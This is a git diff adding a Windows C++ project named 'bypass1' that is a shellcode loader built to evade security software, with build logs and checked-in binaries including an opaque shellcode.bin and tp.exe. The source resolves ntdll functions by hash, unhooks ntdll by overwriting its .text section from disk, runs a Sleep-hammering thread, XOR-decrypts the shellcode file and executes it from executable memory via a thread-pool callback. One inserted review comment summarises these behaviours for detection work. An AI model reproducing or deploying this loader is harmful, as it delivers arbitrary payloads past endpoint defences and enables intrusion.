diff --git a/bypass1/bypass1.cpp b/bypass1/bypass1.cpp
new file mode 100644
index 0000000..1feaeca
--- /dev/null
+++ b/bypass1/bypass1.cpp
@@ -0,0 +1,226 @@
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+
+#pragma comment(lib, "ntdll.lib")
+
+std::unordered_map apiHashTable;
+
+DWORD HashString(const char* str) {
+ DWORD hash = 0;
+ while (*str) {
+ hash = ((hash << 5) + hash) + *str++;
+ }
+ return hash;
+}
+
+FARPROC ResolveAPI(DWORD hash) {
+ if (apiHashTable.find(hash) != apiHashTable.end()) {
+ return apiHashTable[hash];
+ }
+
+ HMODULE hNtdll = GetModuleHandleA("ntdll.dll");
+ if (!hNtdll) return nullptr;
+
+ auto pExportDir = reinterpret_cast(
+ reinterpret_cast(hNtdll) +
+ reinterpret_cast(reinterpret_cast(hNtdll) +
+ reinterpret_cast(hNtdll)->e_lfanew)->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress);
+
+ auto pNames = reinterpret_cast(reinterpret_cast(hNtdll) + pExportDir->AddressOfNames);
+ auto pFunctions = reinterpret_cast(reinterpret_cast(hNtdll) + pExportDir->AddressOfFunctions);
+ auto pOrdinals = reinterpret_cast(reinterpret_cast(hNtdll) + pExportDir->AddressOfNameOrdinals);
+
+ for (DWORD i = 0; i < pExportDir->NumberOfNames; ++i) {
+ const char* apiName = reinterpret_cast(reinterpret_cast(hNtdll) + pNames[i]);
+ DWORD apiHash = HashString(apiName);
+
+ if (apiHash == hash) {
+ auto proc = reinterpret_cast(reinterpret_cast(hNtdll) + pFunctions[pOrdinals[i]]);
+ apiHashTable[hash] = proc;
+ return proc;
+ }
+ }
+ return nullptr;
+}
+
+typedef BOOL(WINAPI* LPDSENUMATTRIBUTES)(void* lpShellcode);
+
+void DecryptShellcode(std::vector& shellcode, unsigned char key) {
+ for (size_t i = 0; i < shellcode.size(); ++i) {
+ shellcode[i] ^= key;
+ }
+}
+
+void UnhookNtdll() {
+ DWORD hashVirtualProtect = HashString("VirtualProtect");
+ FARPROC pVirtualProtect = ResolveAPI(hashVirtualProtect);
+
+ HMODULE hNtdll = GetModuleHandle(L"ntdll.dll");
+ if (!hNtdll) return;
+
+ wchar_t systemDir[MAX_PATH] = { 0 };
+ GetSystemDirectory(systemDir, MAX_PATH);
+
+ wchar_t ntdllPath[MAX_PATH] = { 0 };
+ wcscat_s(ntdllPath, systemDir);
+ wcscat_s(ntdllPath, L"\ntdll.dll");
+
+ HANDLE hFile = CreateFile(ntdllPath, GENERIC_READ, FILE_SHARE_READ, nullptr, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, nullptr);
+ if (hFile == INVALID_HANDLE_VALUE) return;
+
+ DWORD fileSize = GetFileSize(hFile, nullptr);
+ if (fileSize == INVALID_FILE_SIZE) {
+ CloseHandle(hFile);
+ return;
+ }
+
+ HANDLE hMapping = CreateFileMapping(hFile, nullptr, PAGE_READONLY, 0, fileSize, nullptr);
+ if (!hMapping) {
+ CloseHandle(hFile);
+ return;
+ }
+
+ void* pFileData = MapViewOfFile(hMapping, FILE_MAP_READ, 0, 0, 0);
+ if (!pFileData) {
+ CloseHandle(hMapping);
+ CloseHandle(hFile);
+ return;
+ }
+
+ auto pLoadedNtdll = reinterpret_cast(hNtdll);
+ auto pDosHeader = reinterpret_cast(pFileData);
+ auto pNtHeaders = reinterpret_cast(reinterpret_cast(pFileData) + pDosHeader->e_lfanew);
+
+ auto pSectionHeader = IMAGE_FIRST_SECTION(pNtHeaders);
+ for (WORD i = 0; i < pNtHeaders->FileHeader.NumberOfSections; i++, pSectionHeader++) {
+ if (!strcmp(reinterpret_cast(pSectionHeader->Name), ".text")) {
+ DWORD oldProtect;
+ reinterpret_cast(pVirtualProtect)(
+ pLoadedNtdll + pSectionHeader->VirtualAddress,
+ pSectionHeader->Misc.VirtualSize,
+ PAGE_EXECUTE_READWRITE,
+ &oldProtect
+ );
+
+ memcpy(
+ pLoadedNtdll + pSectionHeader->VirtualAddress,
+ reinterpret_cast(pFileData) + pSectionHeader->PointerToRawData,
+ pSectionHeader->SizeOfRawData
+ );
+
+ reinterpret_cast(pVirtualProtect)(
+ pLoadedNtdll + pSectionHeader->VirtualAddress,
+ pSectionHeader->Misc.VirtualSize,
+ oldProtect,
+ &oldProtect
+ );
+ break;
+ }
+ }
+
+ UnmapViewOfFile(pFileData);
+ CloseHandle(hMapping);
+ CloseHandle(hFile);
+}
+
+void APIHammering() {
+ DWORD hashSleep = HashString("Sleep");
+ FARPROC pSleep = ResolveAPI(hashSleep);
+
+ std::thread hammeringThread([pSleep]() {
+ while (true) {
+ reinterpret_cast(pSleep)(10);
+ }
+ });
+
+ hammeringThread.detach();
+}
+
+void ExecuteShellcodeWithThreadpool(const std::vector& shellcode) {
+ void* execMemory = VirtualAlloc(
+ nullptr,
+ shellcode.size(),
+ MEM_COMMIT | MEM_RESERVE,
+ PAGE_EXECUTE_READWRITE
+ );
+
+ if (!execMemory) {
+ return;
+ }
+
+ memcpy(execMemory, shellcode.data(), shellcode.size());
+
+ PTP_WORK work = CreateThreadpoolWork(
+ [](PTP_CALLBACK_INSTANCE, void* context, PTP_WORK) {
+ auto shellcodePtr = reinterpret_cast(context);
+ shellcodePtr();
+ },
+ execMemory,
+ nullptr
+ );
+
+ if (work) {
+ SubmitThreadpoolWork(work);
+ WaitForThreadpoolWorkCallbacks(work, FALSE);
+ CloseThreadpoolWork(work);
+ }
+
+ VirtualFree(execMemory, 0, MEM_RELEASE);
+}
+
+DWORD FindProcessId(const wchar_t* processName) {
+ PROCESSENTRY32 pe32;
+ HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
+ if (hSnapshot == INVALID_HANDLE_VALUE) {
+ return 0;
+ }
+
+ pe32.dwSize = sizeof(PROCESSENTRY32);
+ if (Process32First(hSnapshot, &pe32)) {
+ do {
+ if (!_wcsicmp(pe32.szExeFile, processName)) {
+ CloseHandle(hSnapshot);
+ return pe32.th32ProcessID;
+ }
+ } while (Process32Next(hSnapshot, &pe32));
+ }
+
+ CloseHandle(hSnapshot);
+ return 0;
+}
+
+int main() {
+ const char* filename = "shellcode.bin";
+ const unsigned char key = 0x5A;
+
+ UnhookNtdll();
+ APIHammering();
+
+ std::ifstream file(filename, std::ios::binary);
+ if (!file.is_open()) {
+ return -1;
+ }
+
+ std::vector encryptedShellcode(
+ (std::istreambuf_iterator(file)),
+ std::istreambuf_iterator()
+ );
+ file.close();
+
+ if (encryptedShellcode.empty()) {
+ return -1;
+ }
+
+ DecryptShellcode(encryptedShellcode, key);
+
+ ExecuteShellcodeWithThreadpool(encryptedShellcode);
+
+ return 0;
+}
diff --git a/bypass1/bypass1.sln b/bypass1/bypass1.sln
new file mode 100644
index 0000000..c15bc4d
--- /dev/null
+++ b/bypass1/bypass1.sln
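Review bot: `main` runs whatever bytes `shellcode.bin` holds after XOR with the hard-coded `key = 0x5A`, and the same commit checks in `bypass1/x64/Release/shellcode.bin` and `tp.exe` as opaque binaries alongside build logs, so what this code actually executes cannot be reviewed from the diff. The source also has no header comment; I would add one stating that this is a loader sample and naming the behaviours it produces for anyone writing detections: `UnhookNtdll` overwrites the loaded ntdll `.text` section from the on-disk copy, `ExecuteShellcodeWithThreadpool` allocates `PAGE_EXECUTE_READWRITE` memory and runs a thread-pool callback inside it, and `APIHammering` spawns a detached thread that loops forever on the pointer resolved for `Sleep`. Because the key is a single constant byte, an analyst can recover the payload by XORing the blob with 0x5A. `FindProcessId` and the `LPDSENUMATTRIBUTES` typedef are not referenced anywhere in this hunk and look like leftovers.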
@@ -0,0 +1,31 @@ + +Microsoft Visual Studio Solution File, Format Version 12.00 +# Visual Studio Version 17 +VisualStudioVersion = 17.11.35303.130 +MinimumVisualStudioVersion = 10.0.40219.1 +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "bypass1", "bypass1.vcxproj", "{39C1481D-CD42-4E6E-8435-35AE9744975E}" +EndProject +Global + GlobalSection(SolutionConfigurationPlatforms) = preSolution + Debug|x64 = Debug|x64 + Debug|x86 = Debug|x86 + Release|x64 = Release|x64 + Release|x86 = Release|x86 + EndGlobalSection + GlobalSection(ProjectConfigurationPlatforms) = postSolution + {39C1481D-CD42-4E6E-8435-35AE9744975E}.Debug|x64.ActiveCfg = Debug|x64 + {39C1481D-CD42-4E6E-8435-35AE9744975E}.Debug|x64.Build.0 = Debug|x64 + {39C1481D-CD42-4E6E-8435-35AE9744975E}.Debug|x86.ActiveCfg = Debug|Win32 + {39C1481D-CD42-4E6E-8435-35AE9744975E}.Debug|x86.Build.0 = Debug|Win32 + {39C1481D-CD42-4E6E-8435-35AE9744975E}.Release|x64.ActiveCfg = Release|x64 + {39C1481D-CD42-4E6E-8435-35AE9744975E}.Release|x64.Build.0 = Release|x64 + {39C1481D-CD42-4E6E-8435-35AE9744975E}.Release|x86.ActiveCfg = Release|Win32 + {39C1481D-CD42-4E6E-8435-35AE9744975E}.Release|x86.Build.0 = Release|Win32 + EndGlobalSection + GlobalSection(SolutionProperties) = preSolution + HideSolutionNode = FALSE + EndGlobalSection + GlobalSection(ExtensibilityGlobals) = postSolution + SolutionGuid = {0853DA9C-5E02-47FB-B6E6-E306AD32A614} + EndGlobalSection +EndGlobal diff --git a/bypass1/bypass1.vcxproj b/bypass1/bypass1.vcxproj new file mode 100644 index 0000000..a1e4e71 --- /dev/null +++ b/bypass1/bypass1.vcxproj 
@@ -0,0 +1,141 @@ + + + + + Debug + Win32 + + + Release + Win32 + + + Debug + x64 + + + Release + x64 + + + + 17.0 + Win32Proj + {39c1481d-cd42-4e6e-8435-35ae9744975e} + bypass1 + 10.0 + tp + + + + Application + true + v143 + Unicode + + + Application + false + v143 + true + Unicode + + + Application + true + v143 + Unicode + + + Application + false + v143 + true + Unicode + + + + + + + + + + + + + + + + + + + + + + Level3 + true + WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + + + + + Level3 + true + true + true + WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + true + true + + + + + Level3 + true + _DEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + + + + + Level3 + true + true + false + NDEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + Size + false + false + MultiThreadedDLL + None + + + Console + true + true + false + + + + + + + + + \ No newline at end of file diff --git a/bypass1/bypass1.vcxproj.filters b/bypass1/bypass1.vcxproj.filters new file mode 100644 index 0000000..1549c1a --- /dev/null +++ b/bypass1/bypass1.vcxproj.filters @@ -0,0 +1,22 @@ + + + + + {4FC737F1-C7A5-4376-A066-2A32D752A2FF} + cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx + + + {93995380-89BD-4b04-88EB-625FBE52EBFB} + h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd + + + {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} + rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms + + + + + 源文件 + + + \ No newline at end of file diff --git a/bypass1/bypass1.vcxproj.user b/bypass1/bypass1.vcxproj.user new file mode 100644 index 0000000..0f14913 --- /dev/null +++ b/bypass1/bypass1.vcxproj.user @@ -0,0 +1,4 @@ + + + + \ No newline at end of file diff --git a/bypass1/bypass1/x64/Release/bypass1.Build.CppClean.log b/bypass1/bypass1/x64/Release/bypass1.Build.CppClean.log new file mode 100644 index 0000000..c44cd0f --- /dev/null +++ b/bypass1/bypass1/x64/Release/bypass1.Build.CppClean.log 
@@ -0,0 +1,14 @@ +c:\users\jason\source\repos\bypass1\bypass1\x64\release\vc143.pdb +c:\users\jason\source\repos\bypass1\bypass1\x64\release\bypass1.obj +c:\users\jason\source\repos\bypass1\x64\release\bypass1.exe +c:\users\jason\source\repos\bypass1\x64\release\bypass1.pdb +c:\users\jason\source\repos\bypass1\bypass1\x64\release\bypass1.ipdb +c:\users\jason\source\repos\bypass1\bypass1\x64\release\bypass1.iobj +c:\users\jason\source\repos\bypass1\bypass1\x64\release\bypass1.tlog\cl.command.1.tlog +c:\users\jason\source\repos\bypass1\bypass1\x64\release\bypass1.tlog\cl.items.tlog +c:\users\jason\source\repos\bypass1\bypass1\x64\release\bypass1.tlog\cl.read.1.tlog +c:\users\jason\source\repos\bypass1\bypass1\x64\release\bypass1.tlog\cl.write.1.tlog +c:\users\jason\source\repos\bypass1\bypass1\x64\release\bypass1.tlog\link.command.1.tlog +c:\users\jason\source\repos\bypass1\bypass1\x64\release\bypass1.tlog\link.read.1.tlog +c:\users\jason\source\repos\bypass1\bypass1\x64\release\bypass1.tlog\link.secondary.1.tlog +c:\users\jason\source\repos\bypass1\bypass1\x64\release\bypass1.tlog\link.write.1.tlog diff --git a/bypass1/bypass1/x64/Release/bypass1.exe.recipe b/bypass1/bypass1/x64/Release/bypass1.exe.recipe new file mode 100644 index 0000000..f53c1ae --- /dev/null +++ b/bypass1/bypass1/x64/Release/bypass1.exe.recipe @@ -0,0 +1,11 @@ + + + + + C:\Users\Jason\source\repos\bypass1\x64\Release\bypass1.exe + + + + + + \ No newline at end of file diff --git a/bypass1/bypass1/x64/Release/bypass1.iobj b/bypass1/bypass1/x64/Release/bypass1.iobj new file mode 100644 index 0000000..ca1bf4a Binary files /dev/null and b/bypass1/bypass1/x64/Release/bypass1.iobj differ diff --git a/bypass1/bypass1/x64/Release/bypass1.ipdb b/bypass1/bypass1/x64/Release/bypass1.ipdb new file mode 100644 index 0000000..276dc5d Binary files /dev/null and b/bypass1/bypass1/x64/Release/bypass1.ipdb differ 
diff --git a/bypass1/bypass1/x64/Release/bypass1.log b/bypass1/bypass1/x64/Release/bypass1.log new file mode 100644 index 0000000..0b63a42 --- /dev/null +++ b/bypass1/bypass1/x64/Release/bypass1.log @@ -0,0 +1,6 @@ + tp.cpp + 正在生成代码 + Previous IPDB not found, fall back to full compilation. + All 378 functions were compiled because no usable IPDB/IOBJ from previous compilation was found. + 已完成代码的生成 + bypass1.vcxproj -> C:\Users\Jason\source\repos\bypass1\x64\Release\bypass1.exe diff --git a/bypass1/bypass1/x64/Release/bypass1.tlog/CL.command.1.tlog b/bypass1/bypass1/x64/Release/bypass1.tlog/CL.command.1.tlog new file mode 100644 index 0000000..0bfdd03 Binary files /dev/null and b/bypass1/bypass1/x64/Release/bypass1.tlog/CL.command.1.tlog differ diff --git a/bypass1/bypass1/x64/Release/bypass1.tlog/CL.read.1.tlog b/bypass1/bypass1/x64/Release/bypass1.tlog/CL.read.1.tlog new file mode 100644 index 0000000..cb09dbe Binary files /dev/null and b/bypass1/bypass1/x64/Release/bypass1.tlog/CL.read.1.tlog differ diff --git a/bypass1/bypass1/x64/Release/bypass1.tlog/CL.write.1.tlog b/bypass1/bypass1/x64/Release/bypass1.tlog/CL.write.1.tlog new file mode 100644 index 0000000..0e90cc9 Binary files /dev/null and b/bypass1/bypass1/x64/Release/bypass1.tlog/CL.write.1.tlog differ diff --git a/bypass1/bypass1/x64/Release/bypass1.tlog/Cl.items.tlog b/bypass1/bypass1/x64/Release/bypass1.tlog/Cl.items.tlog new file mode 100644 index 0000000..05ac254 --- /dev/null +++ b/bypass1/bypass1/x64/Release/bypass1.tlog/Cl.items.tlog @@ -0,0 +1 @@ +C:\Users\Jason\source\repos\bypass1\tp.cpp;C:\Users\Jason\source\repos\bypass1\bypass1\x64\Release\tp.obj diff --git a/bypass1/bypass1/x64/Release/bypass1.tlog/bypass1.lastbuildstate b/bypass1/bypass1/x64/Release/bypass1.tlog/bypass1.lastbuildstate new file mode 100644 index 0000000..1fb5cc0 --- /dev/null +++ b/bypass1/bypass1/x64/Release/bypass1.tlog/bypass1.lastbuildstate 
@@ -0,0 +1,2 @@ +PlatformToolSet=v143:VCToolArchitecture=Native64Bit:VCToolsVersion=14.41.34120:TargetPlatformVersion=10.0.22621.0: +Release|x64|C:\Users\Jason\source\repos\bypass1\| diff --git a/bypass1/bypass1/x64/Release/bypass1.tlog/link.command.1.tlog b/bypass1/bypass1/x64/Release/bypass1.tlog/link.command.1.tlog new file mode 100644 index 0000000..f78bf90 Binary files /dev/null and b/bypass1/bypass1/x64/Release/bypass1.tlog/link.command.1.tlog differ diff --git a/bypass1/bypass1/x64/Release/bypass1.tlog/link.read.1.tlog b/bypass1/bypass1/x64/Release/bypass1.tlog/link.read.1.tlog new file mode 100644 index 0000000..1fc2038 Binary files /dev/null and b/bypass1/bypass1/x64/Release/bypass1.tlog/link.read.1.tlog differ diff --git a/bypass1/bypass1/x64/Release/bypass1.tlog/link.secondary.1.tlog b/bypass1/bypass1/x64/Release/bypass1.tlog/link.secondary.1.tlog new file mode 100644 index 0000000..75c1dff --- /dev/null +++ b/bypass1/bypass1/x64/Release/bypass1.tlog/link.secondary.1.tlog @@ -0,0 +1,3 @@ +^C:\USERS\JASON\SOURCE\REPOS\BYPASS1\BYPASS1\X64\RELEASE\TP.OBJ +C:\Users\Jason\source\repos\bypass1\bypass1\x64\Release\bypass1.IPDB +C:\Users\Jason\source\repos\bypass1\bypass1\x64\Release\bypass1.iobj diff --git a/bypass1/bypass1/x64/Release/bypass1.tlog/link.write.1.tlog b/bypass1/bypass1/x64/Release/bypass1.tlog/link.write.1.tlog new file mode 100644 index 0000000..a7b2e15 Binary files /dev/null and b/bypass1/bypass1/x64/Release/bypass1.tlog/link.write.1.tlog differ diff --git a/bypass1/bypass1/x64/Release/bypass1.vcxproj.FileListAbsolute.txt b/bypass1/bypass1/x64/Release/bypass1.vcxproj.FileListAbsolute.txt new file mode 100644 index 0000000..e69de29 diff --git a/bypass1/bypass1/x64/Release/tp.obj b/bypass1/bypass1/x64/Release/tp.obj new file mode 100644 index 0000000..1530c10 Binary files /dev/null and b/bypass1/bypass1/x64/Release/tp.obj differ 
diff --git a/bypass1/bypass1/x64/Release/vc143.pdb b/bypass1/bypass1/x64/Release/vc143.pdb new file mode 100644 index 0000000..c91d7ae Binary files /dev/null and b/bypass1/bypass1/x64/Release/vc143.pdb differ diff --git a/bypass1/tp/x64/Release/bypass1.log b/bypass1/tp/x64/Release/bypass1.log new file mode 100644 index 0000000..94599c4 --- /dev/null +++ b/bypass1/tp/x64/Release/bypass1.log @@ -0,0 +1,3 @@ + bypass1.cpp + LINK : 已指定 /LTCG,但不需要生成代码;从链接命令行中移除 /LTCG 以提高链接器性能 + bypass1.vcxproj -> C:\Users\Jason\source\repos\bypass1\x64\Release\tp.exe diff --git a/bypass1/tp/x64/Release/bypass1.obj b/bypass1/tp/x64/Release/bypass1.obj new file mode 100644 index 0000000..14dde69 Binary files /dev/null and b/bypass1/tp/x64/Release/bypass1.obj differ diff --git a/bypass1/tp/x64/Release/bypass1.vcxproj.FileListAbsolute.txt b/bypass1/tp/x64/Release/bypass1.vcxproj.FileListAbsolute.txt new file mode 100644 index 0000000..e69de29 diff --git a/bypass1/tp/x64/Release/tp.Build.CppClean.log b/bypass1/tp/x64/Release/tp.Build.CppClean.log new file mode 100644 index 0000000..b6cb0b9 --- /dev/null +++ b/bypass1/tp/x64/Release/tp.Build.CppClean.log @@ -0,0 +1,10 @@ +c:\users\jason\source\repos\bypass1\tp\x64\release\bypass1.obj +c:\users\jason\source\repos\bypass1\x64\release\tp.exe +c:\users\jason\source\repos\bypass1\tp\x64\release\tp.tlog\cl.command.1.tlog +c:\users\jason\source\repos\bypass1\tp\x64\release\tp.tlog\cl.items.tlog +c:\users\jason\source\repos\bypass1\tp\x64\release\tp.tlog\cl.read.1.tlog +c:\users\jason\source\repos\bypass1\tp\x64\release\tp.tlog\cl.write.1.tlog +c:\users\jason\source\repos\bypass1\tp\x64\release\tp.tlog\link.command.1.tlog +c:\users\jason\source\repos\bypass1\tp\x64\release\tp.tlog\link.read.1.tlog +c:\users\jason\source\repos\bypass1\tp\x64\release\tp.tlog\link.secondary.1.tlog +c:\users\jason\source\repos\bypass1\tp\x64\release\tp.tlog\link.write.1.tlog 
diff --git a/bypass1/tp/x64/Release/tp.exe.recipe b/bypass1/tp/x64/Release/tp.exe.recipe new file mode 100644 index 0000000..88f57c4 --- /dev/null +++ b/bypass1/tp/x64/Release/tp.exe.recipe @@ -0,0 +1,11 @@ + + + + + C:\Users\Jason\source\repos\bypass1\x64\Release\tp.exe + + + + + + \ No newline at end of file diff --git a/bypass1/tp/x64/Release/tp.tlog/CL.command.1.tlog b/bypass1/tp/x64/Release/tp.tlog/CL.command.1.tlog new file mode 100644 index 0000000..e8c08b4 Binary files /dev/null and b/bypass1/tp/x64/Release/tp.tlog/CL.command.1.tlog differ diff --git a/bypass1/tp/x64/Release/tp.tlog/CL.read.1.tlog b/bypass1/tp/x64/Release/tp.tlog/CL.read.1.tlog new file mode 100644 index 0000000..2b37fcc Binary files /dev/null and b/bypass1/tp/x64/Release/tp.tlog/CL.read.1.tlog differ diff --git a/bypass1/tp/x64/Release/tp.tlog/CL.write.1.tlog b/bypass1/tp/x64/Release/tp.tlog/CL.write.1.tlog new file mode 100644 index 0000000..68176d8 Binary files /dev/null and b/bypass1/tp/x64/Release/tp.tlog/CL.write.1.tlog differ diff --git a/bypass1/tp/x64/Release/tp.tlog/Cl.items.tlog b/bypass1/tp/x64/Release/tp.tlog/Cl.items.tlog new file mode 100644 index 0000000..bb9a79d --- /dev/null +++ b/bypass1/tp/x64/Release/tp.tlog/Cl.items.tlog @@ -0,0 +1 @@ +C:\Users\Jason\source\repos\bypass1\bypass1.cpp;C:\Users\Jason\source\repos\bypass1\tp\x64\Release\bypass1.obj diff --git a/bypass1/tp/x64/Release/tp.tlog/link.command.1.tlog b/bypass1/tp/x64/Release/tp.tlog/link.command.1.tlog new file mode 100644 index 0000000..df02872 Binary files /dev/null and b/bypass1/tp/x64/Release/tp.tlog/link.command.1.tlog differ diff --git a/bypass1/tp/x64/Release/tp.tlog/link.read.1.tlog b/bypass1/tp/x64/Release/tp.tlog/link.read.1.tlog new file mode 100644 index 0000000..7486a2f Binary files /dev/null and b/bypass1/tp/x64/Release/tp.tlog/link.read.1.tlog differ 
diff --git a/bypass1/tp/x64/Release/tp.tlog/link.secondary.1.tlog b/bypass1/tp/x64/Release/tp.tlog/link.secondary.1.tlog new file mode 100644 index 0000000..0da6965 --- /dev/null +++ b/bypass1/tp/x64/Release/tp.tlog/link.secondary.1.tlog @@ -0,0 +1 @@ +^C:\USERS\JASON\SOURCE\REPOS\BYPASS1\TP\X64\RELEASE\BYPASS1.OBJ diff --git a/bypass1/tp/x64/Release/tp.tlog/link.write.1.tlog b/bypass1/tp/x64/Release/tp.tlog/link.write.1.tlog new file mode 100644 index 0000000..31f6af7 Binary files /dev/null and b/bypass1/tp/x64/Release/tp.tlog/link.write.1.tlog differ diff --git a/bypass1/tp/x64/Release/tp.tlog/tp.lastbuildstate b/bypass1/tp/x64/Release/tp.tlog/tp.lastbuildstate new file mode 100644 index 0000000..1fb5cc0 --- /dev/null +++ b/bypass1/tp/x64/Release/tp.tlog/tp.lastbuildstate @@ -0,0 +1,2 @@ +PlatformToolSet=v143:VCToolArchitecture=Native64Bit:VCToolsVersion=14.41.34120:TargetPlatformVersion=10.0.22621.0: +Release|x64|C:\Users\Jason\source\repos\bypass1\| diff --git a/bypass1/x64/Release/shellcode.bin b/bypass1/x64/Release/shellcode.bin new file mode 100644 index 0000000..de7871f Binary files /dev/null and b/bypass1/x64/Release/shellcode.bin differ diff --git a/bypass1/x64/Release/tp.exe b/bypass1/x64/Release/tp.exe new file mode 100644 index 0000000..97e8ea9 Binary files /dev/null and b/bypass1/x64/Release/tp.exe differ